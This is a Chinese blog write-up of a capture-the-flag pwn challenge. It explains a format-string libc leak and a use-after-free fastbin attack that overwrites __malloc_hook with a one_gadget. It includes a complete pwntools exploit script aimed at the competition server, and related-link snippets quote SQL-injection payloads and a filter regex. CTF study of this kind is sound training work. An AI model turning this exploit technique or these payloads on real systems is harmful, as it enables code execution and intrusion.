gyctf_2020_some_thing_interesting

最新推荐文章于 2023-05-09 19:59:44 发布
最新推荐文章于 2023-05-09 19:59:44 发布
阅读量367 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123044773
版权

gyctf_2020_some_thing_interesting

查看保护
请添加图片描述
请添加图片描述
这里有一个格式化漏洞
请添加图片描述
还有uaf。
攻击思路:先借助格式化漏洞输出libc。偏移为17上是libc上的数据,因为是libc2.23下的,所以利用fastbin attack将地址任意申请到malloc_hook - 0x23这里,接着改hook为gadget即可。具体的利用手法看z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25630)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '> Now please tell me what you want to do :'

def check():
    r.sendlineafter(menu, '0')

def add(o_size, o, re_size, re):
    r.sendlineafter(menu, '1')
    r.sendlineafter("> O's length : ", str(o_size))
    r.sendlineafter("> O : ", o)
    r.sendlineafter("> RE's length : ", str(re_size))
    r.sendlineafter("> RE : ", re)

def edit(index, o, re):
    r.sendlineafter(menu, '2')
    r.sendlineafter('> Oreo ID : ', str(index))
    r.sendlineafter('> O : ', o)
    r.sendlineafter('> RE : ', re)

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('> Oreo ID : ', str(index))

def show(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('> Oreo ID : ', str(index))

p1 = b'OreOOrereOOreO' + b'%17$p'

r.sendlineafter('Input your code please:', p1)
check()
r.recvuntil('0x')
#libc_start_main = r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')
libc_start_main = int(r.recv(12), 16)

libc = ELF('libc-2.23.so')
libc_base = libc_start_main - libc.sym['__libc_start_main'] - 240
malloc_hook = libc_base + libc.sym['__malloc_hook']
success('malloc_hook = ' + hex(malloc_hook))

one = [0x45216,0x4526a,0xf02a4, 0xf1147]
one_gadget = libc_base + one[3]

add(0x60, 'aaaa', 0x60, 'bbbb')

delete(1)

p1 = p64(malloc_hook - 0x23)
edit(1, b'a' * 8, p1)

p2 = b'a'* 0x13 + p64(one_gadget)
add(0x68, b'a' * 8, 0x68, p2)

r.recvuntil("#######################\n")
r.sendline('1')
r.recvuntil("> O's length : ")
r.sendline(str(0x68))

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
fm.rar_Thing Thing_python
09-23
描述中的"it is go come say some thing in the web intenet"虽然语法不清晰,但可以推测可能是指这个"Thing Thing"与Web互联网交互有关,可能是Web应用或者网络通信的一部分。 在IT行业中,Python是一种高级、通用...
WATERSHED.zip_Some Nerve
07-14
I did some preproccessing to the nerve images and then applied the watershed transformation. Now, I want to join the continuous points in watershed segmented image and delete the random points from ...
[BUUCTF]PWN——gyctf_2020_some_thing_interesting(格式化字符串+UAF)
mcmuyanga的博客
03-11 825
gyctf_2020_some_thing_interesting 附件 步骤 例行检查,64位程序,保护全开 本地试运行一下程序,看看大概的情况 64位ida载入 sub_B7A() check() create()
【buuoj】gyctf_2020_some_thing_interesting1
qq_42220888的博客
12-27 100
buuoj gyctf_2020_some_thing_interesting 1 做题有感
[BUUCTF]PWN——gyctf_2020_some_thing_exceting
mcmuyanga的博客
01-22 790
gyctf_2020_some_thing_exceting 附件 步骤: 例行检查,64位程序,除了PIE,其他保护全开 本地试运行一下,看看大概的情况 64位ida载入,检索字符串的时候发现了有关flag的信息,由于我本地上没有创建flag文件,所以一开始输出了12行的puts 创建了一个flag,在执行,可以看到经典的堆的菜单 main(),程序主要有3个功能add,delete和show add() delete() show() 利用思路 程序一开始就读入了fl
gyctf_2020_some_thing_interesting(fmt泄露libc,doublefree)
m0_51251108的博客
11-13 420
gyctf_2020_some_thing_interesting: 保护全开 漏洞分析: 字符串只比较到第14个,还有5个我们可以任意填 这里有个格式化字符串漏洞 指针未清零 漏洞利用: gbd调试可以看到偏移的地址指向啥,例如偏移17,指向__libc_start_main+240,我们靠此泄露libc 再利用doublefree,分配chunk到malloc_hook-0x23中,改malloc_hook为og 去getshell exp: 这题free时会释放两个堆,甚至帮我们绕过doubl
XXX.zip_Some of the Parts
09-23
THIS IS A LIBRARY MANAGEMENT SYSTEM IMPLEMENTED IN C YOU CAN USE SOME PARTS OF THE CODE IN YOUR PROGRAM BUT NOT THIS PROGRAM CAN BE PLUBISHED WITHOUT THE AGREEMENT OF THE AUTHOR
遗传算法.zip_some9ju_遗传算法
07-15
有用的遗传算法实例,有助于学习遗传算法,欢迎下载
xmsg.rar_On Message
09-23
int ret = some_system_call(); // 调用系统函数 if (ret ) { // 函数返回错误 char* error_msg = strerror(errno); // 将errno转换为错误信息字符串 fatal("在执行操作时发生错误: %s", error_msg); // 调用...
【buu刷题】gyctf_2020_some_thing_interesting
m0_73756460的博客
05-09 108
【buu刷题】gyctf_2020_some_thing_interesting
gyctf_2020_some_thing_exceting
z1r0的博客
01-20 367
gyctf_2020_some_thing_exceting 查看保护 有uaf flag被存放在了bss段。 放flag的这里的size大小是0x60,在2.23下会检查size的大小是否与fastbin 对应的大小一样。 所以进行fastbin释放时,申请的堆块为0x50即可。fastbin double free attack即可。最后申请0x40的原因是因为0x50对应的fastbin里double free之后会有东西,所以申请其它大小的堆块。 from pwn import * con
【buuctf】gyctf_2020_some_thing_exceting
weixin_51055545的博客
07-22 318
主函数开始时,调用函数,将flag文件打开,注意是在根目录下的flag,然后将flag读到全局变量s处,这个0x60很有帮助,构成了一个堆头;程序申请的0x10的堆块起到了存放指针的作用,很正常的堆布局,直接doublefree,去改指针;64位程序,关闭了pie保护,直接放到ida分析;这里注意要劫持的堆地址为s-0x10,此时;连续申请两次,再show,即可读出flag.将堆块释放后,未将指针置空,存在uaf;先申请2个查看堆布局;漏洞点在删除功能处,...
GYCTF2020_Writeup
Lethe's Blog
03-15 2551
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
i春秋新春战役PWN之Some_thing_exceting
像初雪一样自由洒落
03-09 675
心好累,堆处入手,看明白了,可是总是复盘实现不了。。。不过学长那边可以,是我机子的问题?? 题目链接:https://pan.baidu.com/s/1Tv5Y4ieNVEasZ8oAYYn2Lw 提取码:5td6 文件查看一下 拿到程序发现运行不了,查看文件属性,发现没有执行权限,加一个执行权限 执行不了 因为程序要打开/flag(根目录下flag)文件 ...
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 440
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
gyctf_2020_borrowstack
qq_42728977的博客
04-12 543
栈迁移,这个有点坑。 参考: https://www.cnblogs.com/luoleqi/p/12348341.html
No module named 'some_module'
最新发布
04-21
当你在Python中遇到"No module named 'some_module'"的错误时,这通常意味着你尝试导入一个不存在的模块或者模块名称拼写错误。 要解决这个问题,你可以采取以下几个步骤: 1. 检查模块名称拼写:确保你正确地输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值